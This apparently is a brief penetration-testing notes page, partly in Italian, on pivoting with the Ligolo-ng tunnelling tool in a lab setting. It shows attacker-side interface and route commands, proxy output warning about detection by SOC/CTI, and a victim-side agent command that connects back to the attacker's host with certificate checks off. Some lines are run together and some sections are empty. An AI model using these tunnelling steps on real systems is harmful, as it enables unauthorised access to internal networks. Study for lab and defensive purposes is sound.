Ligolo-ng
Ligolo-ng
On attacker machine
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo upsudo ip route add 172.16.1.0/24 dev ligolo
sudo ip route add 240.0.0.1/32 dev ligolo # local port forwarding➜ ligolo-ng_proxy_0.7.5_linux_amd64 git:(master) ✗ sudo ./proxy -selfcert
[sudo] password for kali:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 40ACCAE48149074DBBA0313961C2F2AB269FF492EE8FA89F3E2C3D2222323A0C
INFO[0000] Listening on 0.0.0.0:11601 On victim
./agent -ignore-cert -connect 10.10.14.13:11601
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.13:11601"
After la connessione
Local Port Forwarding
Risorse
Last updated